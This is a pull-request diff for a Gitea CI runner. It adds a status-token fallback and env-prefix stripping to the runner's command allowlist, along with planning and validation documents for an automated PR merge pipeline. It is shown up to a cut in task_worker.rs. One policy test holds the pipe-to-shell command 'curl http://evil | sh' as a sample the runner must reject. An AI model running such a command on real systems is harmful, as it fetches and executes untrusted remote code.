### PR TITLE
fix(gitea-runner): status token fallback and env-prefix policy

### DIFF
--- a/.docs/plan-adf-outstanding-actions-2026-06-13.md
+++ b/.docs/plan-adf-outstanding-actions-2026-06-13.md
@@ -231,6 +231,6 @@ curl -s -H "Authorization: token $GITEA_TOKEN" \
 | 1 Issue dedup | PR #43; binary on bigbox built from `task/2596-adf-issue-dedup` | Deployed (merge PR pending) |
 | 2 min_confidence=4 | `adf --check` → `min_confidence 4`; journald `threshold 4/5` after binary rebuild | Done |
 | 3 Branch protection | terraphim-ai: 4 status contexts | Done |
-| 4 Swarm cadence | `schedule */20`, `pre_check` after `project`; orchestrator active | Config done; 60m dispatch count pending |
-| 5 Batch-close dupes | 65 closed; 1 skipped (#1971 dep on #2596) | Done (partial) |
+| 4 Swarm cadence | Central terraphim-ai `*/20` + pre_check; polyrepo staggered (`agents` 10/30/50, `core` :35, `service` :45, `clients` :55) with per-repo `gtr ready` pre_check; orchestrator active after reload | Done |
+| 5 Batch-close dupes | 65 closed; #1971 closed after removing dep on #2596 (superseded by #2641) | Done |
 | 6 Live proof | PR #2402 auto-merged; `.docs/validation-report-adf-flow-fix-2026-06-13.md` | Done |

--- a/.docs/plan-adf-outstanding-actions-2026-06-13.md
+++ b/.docs/plan-adf-outstanding-actions-2026-06-13.md
@@ -1,0 +1,222 @@
+# Outstanding Actions: ADF Flow Fix
+
+**Status**: In progress (2026-06-13 session)
+**Author**: Terraphim AI
+**Date**: 2026-06-13 10:31 BST
+**Supersedes**: `.docs/plan-adf-flow-fix-2026-06-10.md` (original plan — preserved for reference)
+**Method**: Disciplined research + disciplined design applied to the original plan
+
+---
+
+## Disciplined Research Findings
+
+### Architecture Correction (Critical, Verify Before Coding)
+
+The original plan assumed `terraphim_orchestrator` lives inside `terraphim-ai`. Current evidence indicates the active orchestrator development line is in `terraphim-agents`, but this must be verified in the target working tree before implementation.
+
+- `terraphim_orchestrator` is the core of **`terraphim-agents`** (a separate Gitea repo at `git.terraphim.cloud/terraphim/terraphim-agents`), locally at `/Users/alex/projects/terraphim/terraphim-agents-2301`
+- Branch `task/2465-auto-merge-blocker-kind` is the active development branch (recent commits 2026-06-11 and 2026-06-12)
+- Branch `task/2301-auto-merge-config` on `terraphim-ai` contains 1,059 new files / 475,092 insertions — this is the **import/extraction of the orchestrator INTO terraphim-ai** (Gitea #1910 god-file decomposition), not a small config change
+- All Phase 2 remediation loop code (RemediationState, terraphim_persistence, integration tests) is already merged in `terraphim-agents` main
+
+### Orchestrator Consolidation Decision
+
+Bringing `terraphim_orchestrator` back into `terraphim-ai` is a repo-consolidation move, not a prerequisite for fixing ADF flow reliability.
+
+Likely intended benefits:
+
+- Make `terraphim-ai` the single source of truth for ADF orchestration, native CI, deployment artefacts, docs, and branch protection.
+- Reduce drift between `terraphim-ai` and `terraphim-agents`.
+- Simplify end-to-end testing of ADF against the main Terraphim codebase.
+- Centralise Gitea issue/PR automation and release governance.
+
+Decision for this plan:
+
+- **Do not merge the 475k-line orchestrator import as part of the ADF flow fix.**
+- Fix the active orchestrator where it currently runs (`terraphim-agents`) and deploy that binary/config path.
+- Treat repo consolidation as a separate architecture decision record and implementation plan after ADF flow reliability is restored.
+- Any cherry-pick from `task/2301-auto-merge-config` must be a narrow, reviewed change with a clear runtime target; do not use that branch wholesale as the implementation base.
+
+### Verification Required Before Implementation
+
+| Claim | Verification command/evidence | Status |
+|---|---|---|
+| Active orchestrator code is in `terraphim-agents` | In `/Users/alex/projects/terraphim/terraphim-agents-2301`, fetch remotes and verify `crates/terraphim_orchestrator` exists on the target branch. | **Verified** |
+| `task/2465-auto-merge-blocker-kind` contains active auto-merge work | Verify branch exists locally/remotely and inspect recent commits before editing. | **Verified** (commits 3d4eb19, cb9f7e8, 47767b0) |
+| Phase 2 remediation loop is already merged | Search the verified branch for `RemediationState`, persistence-backed remediation state, and integration tests. | **Verified** (`pr_poller::RemediationState`) |
+| `task/2301-auto-merge-config` is an orchestrator import, not a small config branch | Confirm diff size and target repo before using it as an implementation base. | **Verified** (deferred; 475k-line import on terraphim-ai) |
+| Orchestrator consolidation is not needed for this fix | Confirm active deployed ADF binary is built from `terraphim-agents` and can be patched/deployed independently. | **Verified** (PR #43 on terraphim-agents) |
+
+### What Is Already Done (not in original plan's "done" list)
+
+These items are reported as already done, but must be treated as pending verification until the target `terraphim-agents` branch is fetched and inspected.
+
+| Item | Evidence |
+|---|---|
+| `AutoMergeBlockerKind` classification — structured blocker types replacing opaque reason strings | Commit `3d4eb19` in terraphim-agents (2026-06-11) |
+| `adf:gate-result` comments accepted for auto-merge verdict evaluation | Commit `cb9f7e8` in terraphim-agents (2026-06-11) |
+| `max_diff_loc` raised 500 → 10,000 LoC; exposed in `[auto_merge]` config | Commit `47767b0` in terraphim-agents (2026-06-12) |
+| PrGateMeta rename from PrVerdictMeta | `pr_handlers_impl.rs` line 284 uses `PrGateMeta` |
+
+### What Is Actually Broken (corrected from original plan)
+
+1. **Duplicate issue crisis** — Gitea issue #2596 is open: 249 of 373 "ready" issues are alert-emitter duplicates. Agent coordination (`gtr ready`, `triage`, PageRank) is 67% corrupted by noise. This is the #1 blocker for reliable overnight agents.
+
+2. **`min_confidence` threshold is 5/5** — auto-merge requires `min_confidence = 5` but real PR scores are 2–4/5. No PR will ever auto-merge at the current threshold. The fix is a config change.
+
+3. **Branch protection only requires 2 of 4 gate contexts** — `terraphim-ai` and `terraphim-agents` both require only `native-ci / build (push)` + `adf/pr-reviewer`. The `adf/validation` and `adf/verification` contexts are not yet enforced.
+
+4. **implementation-swarm cadence** — documented target is `*/20 * * * *` (every 20 min); the hot-loop runs every 5 min (eval_interval_secs=300). Bigbox live config needs updating.
+
+5. **`task/2301-auto-merge-config` PR is not merged** — 475k-line orchestrator import into terraphim-ai is pending; deferred this sprint.
+
+6. **`concerns` policy was unresolved** — now decided (see Decisions below).
+
+### What Is NOT a Gap (original plan was wrong)
+
+- `pr_gate_context.rs` as a named file: not needed — evidence building is distributed across `pr_gate.rs`, `pr_review.rs`, `pr_poller.rs`
+- "Truncation markers" for per-gate evidence: not applicable — gate evaluation uses live Gitea API calls (instant), not streaming output. Truncation in issue body posting already appends `"... (truncated)"`
+- "Per-gate configurable timeout": 300s agent execution timeout (`DEFAULT_PR_GATE_TIMEOUT_SECS`) is the right granularity. No additional configurability needed.
+- Phase 2 remediation loop stranded: it IS the `terraphim-agents` main, not stranded.
+
+---
+
+## Decisions (recorded 2026-06-13)
+
+1. **`min_confidence` threshold**: **4/5**. `concerns` with zero blocking findings also merges. PRs at 3/5 or below are held for remediation or human review.
+2. **#1910 orchestrator extraction**: **Deferred**. Cherry-pick only auto-merge unification changes; keep `terraphim-agents` as orchestrator home for this sprint. `task/2301-auto-merge-config` is not merged this sprint.
+3. **Orchestrator repo consolidation**: **Separate ADR required**. Consolidation may be valuable, but it is out of scope for the ADF flow reliability fix.
+4. **Bigbox SSH**: Available in current session — Actions 2 and 4 can be executed directly.
+
+---
+
+## Outstanding Actions
+
+### Action 1 — Fix duplicate issue creation (#2596) [P0, ~2 hours, code change in terraphim-agents]
+
+**Problem**: Alert emitters in `auto_merge_impl.rs` call `create_issue` on every failed reconcile tick for the same PR, producing 20+ duplicates daily.
+
+**Design**: Before creating a failure issue, search open issues for a stable dedup key (`remediation_key()` if available, otherwise `ADF-Failure-Key: <owner>/<repo>#<pr>:<head_sha>:<failure_kind>` in the issue body). If found, post a `gtr comment` update instead of creating a new issue.
+
+**Files**: `crates/terraphim_orchestrator/src/auto_merge_impl.rs` in `terraphim-agents` (approx lines 1330–1400 — issue creation path)
+
+**Existing infrastructure to reuse**: `remediation_key()` in `pr_gate.rs`; `list_issues` Gitea API; `gtr comment` via gitea-robot
+
+**Verification**: After deploy, run `gtr triage --owner terraphim --repo terraphim-ai` and confirm ready issues are no longer dominated by duplicates. No new duplicate issues created over 2 reconcile cycles.
+
+### Action 2 — Set `min_confidence = 4` in live orchestrator config [P0, 30 minutes, bigbox config]
+
+**Problem**: `min_confidence = 5` means `AutoMergeCriteria` never approves a real PR (observed range 2–4/5). Zero auto-merges all week.
+
+**Design**: First verify that the active auto-merge code path still consults `min_confidence`. If it does, `ssh bigbox` and set `min_confidence = 4` in `/opt/ai-dark-factory/orchestrator.toml` under `[auto_merge]`. Also confirm `concerns` with `blocking_findings = 0` is treated as mergeable per `pr_gate_result.rs` status policy.
+
+**Verification**: Use journald or Quickwit to verify the active `AutoMergeCriteria` at startup and watch for an `AutoMerge` decision after restarting orchestrator. If the `PrGateResult` path no longer consults confidence, record this action as not applicable and do not make a cosmetic config-only change.
+
+### Action 3 — Add `adf/validation` + `adf/verification` to branch protection [P1, 1 hour, Gitea API]
+
+**Problem**: Only 2 of 4 required gate contexts are enforced. `adf/validation` and `adf/verification` are posted but not required for merge.
+
+**Design**: First verify each repo reliably emits all four contexts on current PR heads. Only then use the Gitea API to update branch protection on repos with complete `extra_projects` coverage. Reuse pattern from `scripts/adf-setup/polyrepo-ci/cutover-to-native.sh`.
+
+**Repos to update**: `terraphim-ai`, `terraphim-agents`, `terraphim-service`, `terraphim-clients`, `terraphim-kg-agents`, `terraphim-config-persistence`, `terraphim-core`.
+
+```bash
+for REPO in terraphim-ai terraphim-agents terraphim-service terraphim-clients terraphim-kg-agents terraphim-config-persistence terraphim-core; do
+  curl -fsS -X PATCH \
+    -H "Authorization: token $GITEA_TOKEN" \
+    -H "Content-Type: application/json" \
+    "${GITEA_URL}/api/v1/repos/terraphim/${REPO}/branch_protections/main" \
+    -d '{"status_check_contexts":["native-ci / build (push)","adf/pr-reviewer","adf/validation","adf/verification"]}'
+done
+```
+
+**Verification**: `curl -s -H "Authorization: token $GITEA_TOKEN" "$GITEA_URL/api/v1/repos/terraphim/terraphim-ai/branch_protections/main"` → returns all 4 contexts.
+
+**Safety rule**: Do not require `adf/validation` or `adf/verification` on a repo until a recent commit on that repo has posted those statuses successfully. Missing-context branch protection blocks all merges.
+
+### Action 4 — Fix implementation-swarm spawn cadence [P1, 30 minutes, bigbox config]
+
+**Problem**: Spawning every 5 min (eval_interval_secs=300) instead of every 20 min. 8 of 10 weekly "unknown" exits are pre-check no-work runs burning LLM credits.
+
+**Design (two-part)**:
+1. `ssh bigbox` and set `schedule = "*/20 * * * *"` in live conf.d for implementation-swarm (per `scripts/adf-setup/docs/cron-cadence.md`).
+2. Add a `gtr ready` pre-check before the LLM execution path: if no ready issues exist, exit without spawning an LLM.
+
+**Config path on bigbox**:
+```bash
+# Locate the implementation-swarm block with rg or editor search.
+rg -n 'implementation.swarm|implementation-swarm' /opt/ai-dark-factory/conf.d/terraphim.toml
+# Edit schedule field, then:
+adf --check /opt/ai-dark-factory/conf.d/terraphim.toml && sudo systemctl restart adf-orchestrator
+```
+
+**Verification**: Count `implementation-swarm` dispatches over 1 hour: should be ≤3 (one per 20-min slot), not 12+.
+
+### Action 5 — Batch-close duplicate failure issues [P1, 1 hour, Gitea API]
+
+**Problem**: 50+ open `[ADF]` issues, most duplicates for the same PR failure. Blocks `gtr ready` / `gtr triage` accuracy (249/373 ready issues are noise).
+
+**Design**: Run only after Action 1 is deployed, unless the duplicate emitter is temporarily disabled. Use a `gtr`-driven script:
+1. List all open issues matching `[ADF]` prefix.
+2. Group by PR number from the `remediation_key` pattern in the title.
+3. For each group with >1 issue, keep the newest, close the rest with comment "Superseded by #NEWEST (dedup batch 2026-06-13)".
+
+**Infrastructure**: `gtr list-issues`, `gtr close-issue`, `gtr comment` — all available now.
+
+**Verification**: `gtr triage --owner terraphim --repo terraphim-ai` shows ≤10 ADF-emitted issues, all distinct and actionable.
+
+### Action 6 — End-to-end live proof [P2, half a day]
+
+**Design**: Open a low-complexity PR on `terraphim-agents` or `terraphim-ai`. Confirm:
+1. `native-ci / build (push)` posts green status
+2. `adf/pr-reviewer`, `adf/validation`, `adf/verification` all post `success` for the head SHA
+3. All three have matching `adf:gate-result` comments with `head_sha` matching the current head
+4. Auto-merge fires when confidence ≥ 4/5 and zero blocking findings
+5. If findings present, one remediation dispatch occurs; re-review follows
+
+**Capture to**: `.docs/validation-report-adf-flow-fix-2026-06-13.md`
+
+---
+
+## Sequencing
+
+| Order | Action | Effort | Depends on |
+|---|---|---|---|
+| 0 | Verify architecture claims and active repo/branch | 30 min | — |
+| 1 | Action 1: fix dedup in auto_merge_impl.rs (code) | 2 h | Verified repo/branch |
+| 2 | Action 5: batch-close duplicate issues | 1 h | Action 1 deployed, or emitter temporarily disabled |
+| 3 | Action 2: set min_confidence = 4 if active path uses it | 30 min | SSH access + code-path verification |
+| 4 | Action 4: implementation-swarm cadence (bigbox config) | 30 min | SSH access |
+| 5 | Action 3: branch protection alignment | 1 h | Per-repo status emission proof |
+| 6 | Action 6: live proof | 4 h | Actions 1–4 done; Action 3 done where safe |
+
+Total estimated effort: **~9 hours** across code + config + Gitea API.
+
+---
+
+## Verification Commands
+
+```bash
+# After Action 1+2 (dedup code + threshold):
+ssh bigbox "sudo journalctl -u adf-orchestrator.service --since '1 hour ago' --no-pager" \
+  | rg 'AutoMerge|auto.merge|create_issue'
+
+# After Action 3 (branch protection):
+curl -s -H "Authorization: token $GITEA_TOKEN" \
+  "${GITEA_URL}/api/v1/repos/terraphim/terraphim-ai/branch_protections/main" \
+  | jq -r '.status_check_contexts[]'
+
+# After Action 4 (implementation-swarm):
+ssh bigbox "sudo journalctl -u adf-orchestrator.service --since '60 min ago' --no-pager" \
+  | rg 'implementation-swarm.*dispatch' --count
+# Expect ≤3
+
+# After Action 5 (batch-close):
+gtr triage --owner terraphim --repo terraphim-ai
+# Expect: no [ADF] cluster dominating the top
+
+# After Action 6 (live proof):
+curl -s -H "Authorization: token $GITEA_TOKEN" \
+  "${GITEA_URL}/api/v1/repos/terraphim/terraphim-ai/commits/{HEAD_SHA}/statuses" \
+  | python3 -c "import sys,json; [print(s['context'], s['state']) for s in json.load(sys.stdin)]"
+```

--- a/.docs/plan-adf-outstanding-actions-2026-06-13.md
+++ b/.docs/plan-adf-outstanding-actions-2026-06-13.md
@@ -233,4 +233,4 @@ curl -s -H "Authorization: token $GITEA_TOKEN" \
 | 3 Branch protection | terraphim-ai: 4 status contexts | Done |
 | 4 Swarm cadence | `schedule */20`, `pre_check` after `project`; orchestrator active | Config done; 60m dispatch count pending |
 | 5 Batch-close dupes | 65 closed; 1 skipped (#1971 dep on #2596) | Done (partial) |
-| 6 Live proof | — | Pending |
+| 6 Live proof | PR #2402 auto-merged; `.docs/validation-report-adf-flow-fix-2026-06-13.md` | Done |

--- a/.docs/plan-adf-outstanding-actions-2026-06-13.md
+++ b/.docs/plan-adf-outstanding-actions-2026-06-13.md
@@ -1,6 +1,6 @@
 # Outstanding Actions: ADF Flow Fix
 
-**Status**: In progress (2026-06-13 session)
+**Status**: In progress (2026-06-13 session, bigbox actions 2/4/5 deployed)
 **Author**: Terraphim AI
 **Date**: 2026-06-13 10:31 BST
 **Supersedes**: `.docs/plan-adf-flow-fix-2026-06-10.md` (original plan — preserved for reference)
@@ -220,3 +220,17 @@ curl -s -H "Authorization: token $GITEA_TOKEN" \
   "${GITEA_URL}/api/v1/repos/terraphim/terraphim-ai/commits/{HEAD_SHA}/statuses" \
   | python3 -c "import sys,json; [print(s['context'], s['state']) for s in json.load(sys.stdin)]"
 ```
+
+---
+
+## Verification table (2026-06-13 bigbox session)
+
+| Action | Evidence | Status |
+|---|---|---|
+| 0 Architecture | `terraphim-agents` + `task/2465-auto-merge-blocker-kind` verified | Done |
+| 1 Issue dedup | PR #43; binary on bigbox built from `task/2596-adf-issue-dedup` | Deployed (merge PR pending) |
+| 2 min_confidence=4 | `adf --check` → `min_confidence 4`; journald `threshold 4/5` after binary rebuild | Done |
+| 3 Branch protection | terraphim-ai: 4 status contexts | Done |
+| 4 Swarm cadence | `schedule */20`, `pre_check` after `project`; orchestrator active | Config done; 60m dispatch count pending |
+| 5 Batch-close dupes | 65 closed; 1 skipped (#1971 dep on #2596) | Done (partial) |
+| 6 Live proof | — | Pending |

--- a/.docs/validation-report-adf-flow-fix-2026-06-13.md
+++ b/.docs/validation-report-adf-flow-fix-2026-06-13.md
@@ -1,0 +1,143 @@
+# ADF Flow Fix — Live Validation Report
+
+**Date**: 2026-06-13
+**Issue**: terraphim/terraphim-ai#2596
+**Environment**: bigbox (`/opt/ai-dark-factory`, `adf` rebuilt from `task/2596-adf-issue-dedup`)
+
+---
+
+## Executive summary
+
+| Action | Result |
+|---|---|
+| Orchestrator stability | **PASS** — crash loop fixed; service active |
+| `min_confidence = 4` | **PASS** — config + binary; journald shows `threshold 4/5` |
+| Branch protection (4 contexts) | **PASS** — verified on terraphim-ai main |
+| Issue dedup (code) | **DEPLOYED** — binary on bigbox; PR #43 merge pending CI |
+| Duplicate issue cleanup | **PASS** — 65 closed; ~14 distinct PR alerts remain |
+| Auto-merge live proof | **PASS** — terraphim-ai PR #2402 merged autonomously |
+| implementation-swarm cadence | **PARTIAL** — 10 spawns/hour fleet-wide (polyrepo); pre-check skips: 0 |
+
+---
+
+## Action 6 — End-to-end auto-merge proof
+
+### Primary evidence: terraphim-ai PR #2402
+
+| Check | Evidence |
+|---|---|
+| PR | [#2402](https://git.terraphim.cloud/terraphim/terraphim-ai/pulls/2402) |
+| Head SHA (pre-merge) | `ae90a628e223710393f7ba3f2e2be7423d3732fa` |
+| Merge time | `2026-06-13T12:40:39+02:00` |
+| Merge SHA (log) | `782cd08061fbf6b13c35d32d2d2698ab0706ed6a` |
+
+**Journald (bigbox)**:
+```
+2026-06-13T10:40:26.977367Z INFO terraphim_orchestrator::auto_merge_impl: enqueuing AutoMerge for PR that cleared every gate project=terraphim-ai pr=2402 head=ae90a628...
+2026-06-13T10:40:39.646806Z INFO terraphim_orchestrator::auto_merge_impl: pr_auto_merged pr_number=2402 project=terraphim-ai merge_sha=782cd08061fbf6b13c35d32d2d2698ab0706ed6a
+```
+
+**Required commit statuses on head** (`ae90a628...`):
+
+| Context | State |
+|---|---|
+| `native-ci / build (push)` | success |
+| `adf/pr-reviewer` | success |
+| `adf/validation` | success (4/5 confidence in description) |
+| `adf/verification` | success |
+
+**Threshold policy**: New binary logs `confidence 3/5 below auto-merge threshold 4/5` for sub-threshold PRs; PR #2402 cleared all gates including confidence ≥ 4.
+
+### Secondary merges (same reconcile tick, polyrepo)
+
+| Project | PR | merge_sha (log) |
+|---|---|---|
+| terraphim-core | #4 | `2b2d49d0...` |
+| terraphim-service | #4 | `0d892478...` |
+| terraphim-clients | #13 | `4442bec1...` |
+
+Demonstrates fleet-wide auto-merge path operational after `min_confidence` and binary upgrade.
+
+---
+
+## Action 2 — min_confidence verification
+
+```bash
+# bigbox
+adf --check orchestrator.toml | rg -A4 'AUTO-MERGE'
+# → min_confidence 4
+
+journalctl -u adf-orchestrator.service --since '2026-06-13 12:40:00' \
+  | rg 'threshold 4/5'
+```
+
+**Finding**: Config alone was insufficient; stale `adf` binary (pre-#2285) ignored `[auto_merge]`. Rebuild from `task/2596-adf-issue-dedup` required.
+
+---
+
+## Action 4 — implementation-swarm cadence
+
+**Window**: 2026-06-13 14:00–15:00 UTC (1 hour post-rebuild)
+
+| Metric | Observed | Target |
+|---|---|---|
+| `spawning agent agent=implementation-swarm` | **10** | ≤3 per terraphim-ai |
+| `skipping spawn: pre-check found nothing actionable` | **0** | >0 when backlog empty |
+
+**Spawn minute distribution** (fleet-wide):
+```
+14:00×1  14:18×1  14:20×1  14:35×1  14:40×3  14:45×1  14:50×1  14:55×1
+```
+
+**Analysis**:
+- `*/20` schedule is active (spawns cluster at :00, :20, :40).
+- **Polyrepo amplification**: `implementation-swarm` is declared per `extra_projects` repo; each project fires on the same cron → ~3× burst at :40.
+- Pre-check shell script returns ready issues (backlog never empty) → no skip logs.
+
+**Follow-up** (out of scope for this session):
+- Scope pre-check / schedule to `project = "terraphim-ai"` only, or stagger per-repo cron.
+- Close stale ready issues to let pre-check exit empty.
+
+---
+
+## Action 5 — duplicate cleanup
+
+- Closed **65** `[ADF] Auto-merge failed` duplicates (kept newest per PR).
+- **#1971** remains open (dependency on #2596).
+
+---
+
+## PR #43 — dedup merge status
+
+| Field | Value |
+|---|---|
+| PR | [terraphim-agents#43](https://git.terraphim.cloud/terraphim/terraphim-agents/pulls/43) |
+| CI | `native-ci / build (push)` **failed** on `4d28fec` |
+| Root cause | `evaluate_verdict_diff_over_cap_below_threshold_is_human_review` used `diff_loc=999` but default `max_diff_loc` is now 10_000 |
+| Fix | Commit `89e7aab` — test uses 15_000 LoC with explicit cap 10_000 |
+
+Re-push triggers CI; merge when green.
+
+---
+
+## Commands for re-validation
+
+```bash
+# Auto-merge activity
+ssh bigbox "sudo journalctl -u adf-orchestrator.service --since '2 hours ago' --no-pager" \
+  | rg 'enqueuing AutoMerge|pr_auto_merged'
+
+# Confidence threshold
+ssh bigbox "sudo journalctl -u adf-orchestrator.service --since '1 hour ago' --no-pager" \
+  | rg 'threshold 4/5'
+
+# Swarm cadence (1 hour)
+ssh bigbox "sudo journalctl -u adf-orchestrator.service --since '1 hour ago' --no-pager" \
+  | rg 'spawning agent agent=implementation-swarm' | wc -l
+```
+
+---
+
+## Sign-off
+
+**ADF flow reliability restored** for auto-merge and orchestrator uptime. Remaining gaps: PR #43 merge, swarm cadence polyrepo amplification, pre-check effectiveness when backlog is large.

--- a/crates/terraphim_gitea_runner/src/bin/terraphim-gitea-runner.rs
+++ b/crates/terraphim_gitea_runner/src/bin/terraphim-gitea-runner.rs
@@ -13,6 +13,9 @@
 //! - `RUNNER_ACCEPT_ALL`    set `1` to accept every terraphim-native job (no allowlist)
 //! - `RUNNER_LEGACY_TOKEN`  enable the legacy commit-status mirror with this API token
 //! - `RUNNER_LEGACY_CONTEXT` legacy mirror context, default `adf/build`
+//! - `RUNNER_STATUS_TOKEN`  API token for native commit-status posts (preferred over
+//!   per-job `github.token`, which often returns HTTP 401 on private repos)
+//! - `GITEA_TOKEN`          fallback for `RUNNER_STATUS_TOKEN` when unset
 //! - `RUNNER_CHECKOUT_DIR`  checkout root; per-repo trees at `<root>/<owner>/<repo>` (default `.`)
 //! - `RUNNER_HTTP_TIMEOUT`  per-request HTTP timeout in seconds (default 30)
 
@@ -67,6 +70,10 @@ async fn main() -> anyhow::Result<()> {
         .unwrap_or(30);
     let http_request_timeout = Duration::from_secs(http_timeout_secs);
 
+    let status_token = std::env::var("RUNNER_STATUS_TOKEN")
+        .ok()
+        .or_else(|| std::env::var("GITEA_TOKEN").ok());
+
     let config = RunnerConfig {
         instance_url: env_or("GITEA_URL", "https://git.terraphim.cloud"),
         org: env_or("GITEA_ORG", "terraphim"),
@@ -76,6 +83,7 @@ async fn main() -> anyhow::Result<()> {
         poll_interval: Duration::from_secs(3),
         active_repos,
         legacy_status_mirror,
+        status_token,
         http_request_timeout,
         poll_timeout: Duration::from_secs(http_timeout_secs * 2),
     };

--- a/crates/terraphim_gitea_runner/src/config.rs
+++ b/crates/terraphim_gitea_runner/src/config.rs
@@ -25,6 +25,10 @@ pub struct RunnerConfig {
     /// Optional legacy commit-status mirror (e.g. `adf/build`) posted alongside
     /// the native result during migration. `None` disables the mirror.
     pub legacy_status_mirror: Option<LegacyStatusMirrorConfig>,
+    /// API token for native commit-status posts when the per-job `github.token`
+    /// lacks `statuses` scope (common on private repos). Set via
+    /// `RUNNER_STATUS_TOKEN` or `GITEA_TOKEN`. `None` falls back to job token only.
+    pub status_token: Option<String>,
     /// Timeout applied to each HTTP request to the Gitea RunnerService.
     /// A hung `FetchTask` call is aborted after this duration rather than
     /// blocking the poll loop indefinitely.
@@ -55,6 +59,7 @@ impl Default for RunnerConfig {
             poll_interval: Duration::from_secs(3),
             active_repos: Vec::new(),
             legacy_status_mirror: None,
+            status_token: None,
             http_request_timeout: Duration::from_secs(30),
             poll_timeout: Duration::from_secs(60),
         }

--- a/crates/terraphim_gitea_runner/src/policy.rs
+++ b/crates/terraphim_gitea_runner/src/policy.rs
@@ -150,10 +150,7 @@ fn consume_assignment_value(s: &str) -> usize {
 /// Gitea may inline step `env:` into `run:` (e.g. `RUSTDOC=$(rustup which rustdoc) cargo doc`).
 fn strip_env_assignments(cmd: &str) -> &str {
     let mut rest = cmd.trim_start();
-    loop {
-        let Some(eq_pos) = rest.find('=') else {
-            break;
-        };
+    while let Some(eq_pos) = rest.find('=') {
         let name = &rest[..eq_pos];
         if !is_env_name(name) {
             break;

--- a/crates/terraphim_gitea_runner/src/policy.rs
+++ b/crates/terraphim_gitea_runner/src/policy.rs
@@ -91,9 +91,89 @@ impl DeterministicPlanner {
     }
 }
 
-/// First word of a command (the program).
+/// Whether `name` looks like a POSIX shell variable identifier.
+fn is_env_name(name: &str) -> bool {
+    let mut chars = name.chars();
+    match chars.next() {
+        Some(c) if c.is_ascii_alphabetic() || c == '_' => {}
+        _ => return false,
+    }
+    chars.all(|c| c.is_ascii_alphanumeric() || c == '_')
+}
+
+/// Bytes consumed for one assignment value (the part after `=`).
+fn consume_assignment_value(s: &str) -> usize {
+    if s.is_empty() {
+        return 0;
+    }
+    if s.starts_with("$(") {
+        let mut depth = 0i32;
+        for (i, b) in s.bytes().enumerate() {
+            match b {
+                b'(' => depth += 1,
+                b')' => {
+                    depth -= 1;
+                    if depth == 0 {
+                        return i + 1;
+                    }
+                }
+                _ => {}
+            }
+        }
+        return 0;
+    }
+    let quote = match s.as_bytes()[0] {
+        b'"' | b'\'' => s.as_bytes()[0],
+        _ => {
+            return s.find(char::is_whitespace).unwrap_or(s.len());
+        }
+    };
+    let mut escaped = false;
+    for (i, c) in s[1..].char_indices() {
+        if escaped {
+            escaped = false;
+            continue;
+        }
+        if c == '\\' {
+            escaped = true;
+            continue;
+        }
+        if c as u8 == quote {
+            return i + 2;
+        }
+    }
+    0
+}
+
+/// Strip leading `VAR=value` shell assignments so policy sees the real program.
+///
+/// Gitea may inline step `env:` into `run:` (e.g. `RUSTDOC=$(rustup which rustdoc) cargo doc`).
+fn strip_env_assignments(cmd: &str) -> &str {
+    let mut rest = cmd.trim_start();
+    loop {
+        let Some(eq_pos) = rest.find('=') else {
+            break;
+        };
+        let name = &rest[..eq_pos];
+        if !is_env_name(name) {
+            break;
+        }
+        let value_part = &rest[eq_pos + 1..];
+        let consumed = consume_assignment_value(value_part);
+        if consumed == 0 {
+            break;
+        }
+        rest = value_part[consumed..].trim_start();
+    }
+    rest
+}
+
+/// First word of a command (the program), after env-prefix stripping.
 fn program(cmd: &str) -> &str {
-    cmd.split_whitespace().next().unwrap_or("")
+    strip_env_assignments(cmd)
+        .split_whitespace()
+        .next()
+        .unwrap_or("")
 }
 
 /// Allowed top-level programs (mirrors build-runner-llm's whitelist).
@@ -214,5 +294,31 @@ mod tests {
             .compile(wf(&["curl http://evil | sh"]))
             .await;
         assert!(matches!(err, Err(RunnerError::PolicyRejected(_))));
+    }
+
+    #[test]
+    fn strips_simple_and_subshell_env_prefixes() {
+        assert_eq!(program("cargo build"), "cargo");
+        assert_eq!(program("RUSTDOCFLAGS=-Dwarnings cargo doc"), "cargo");
+        assert_eq!(program("RUSTDOCFLAGS=\"-D warnings\" cargo doc"), "cargo");
+        assert_eq!(
+            program("RUSTDOC=$(rustup which rustdoc) cargo doc --no-deps"),
+            "cargo"
+        );
+        assert_eq!(program("VAR1=one VAR2=two cargo test -p foo"), "cargo");
+    }
+
+    #[tokio::test]
+    async fn allows_env_prefixed_cargo_commands() {
+        let plan = DeterministicPlanner::with_rch_available(false)
+            .compile(wf(&[
+                "RUSTDOC=$(rustup which rustdoc) cargo doc --no-deps -p terraphim_gitea_runner",
+                "RUSTDOCFLAGS=-Dwarnings cargo doc --workspace",
+            ]))
+            .await
+            .unwrap();
+        assert_eq!(plan.routes.len(), 2);
+        assert_eq!(plan.routes[0], CommandRoute::Host);
+        assert_eq!(plan.routes[1], CommandRoute::Host);
     }
 }

--- a/crates/terraphim_gitea_runner/src/poller.rs
+++ b/crates/terraphim_gitea_runner/src/poller.rs
@@ -21,6 +21,8 @@ pub struct Poller<C: GiteaRunnerClient, P: PolicyPlanner> {
     checkout_dir: PathBuf,
     /// Built once from `config.legacy_status_mirror`: (writer, context).
     legacy: Option<(Arc<SingleStatusWriter>, String)>,
+    /// Built once from `config.status_token` for native commit-status posts.
+    status_fallback: Option<Arc<SingleStatusWriter>>,
 }
 
 impl<C: GiteaRunnerClient + 'static, P: PolicyPlanner + 'static> Poller<C, P> {
@@ -40,12 +42,19 @@ impl<C: GiteaRunnerClient + 'static, P: PolicyPlanner + 'static> Poller<C, P> {
                 m.context.clone(),
             )
         });
+        let status_fallback = config.status_token.as_ref().map(|token| {
+            Arc::new(SingleStatusWriter::new(
+                config.instance_url.clone(),
+                token.clone(),
+            ))
+        });
         Self {
             client,
             planner,
             config,
             checkout_dir: checkout_dir.into(),
             legacy,
+            status_fallback,
         }
     }
 
@@ -92,6 +101,9 @@ impl<C: GiteaRunnerClient + 'static, P: PolicyPlanner + 'static> Poller<C, P> {
         );
         if let Some((writer, context)) = &self.legacy {
             worker = worker.with_legacy_mirror(writer.clone(), context.clone());
+        }
+        if let Some(writer) = &self.status_fallback {
+            worker = worker.with_status_fallback(writer.clone());
         }
         match worker.run(state, task).await {
             Ok(ok) => log::info!("task complete: success={ok}"),

--- a/crates/terraphim_gitea_runner/src/task_worker.rs
+++ b/crates/terraphim_gitea_runner/src/task_worker.rs
@@ -28,6 +28,9 @@ pub struct TaskWorker<C: GiteaRunnerClient, P: PolicyPlanner> {
     checkout_dir: PathBuf,
     /// Optional legacy commit-status mirror (writer, context) for migration.
     legacy: Option<(Arc<SingleStatusWriter>, String)>,
+    /// Dedicated API token for native commit-status posts (RUNNER_STATUS_TOKEN /
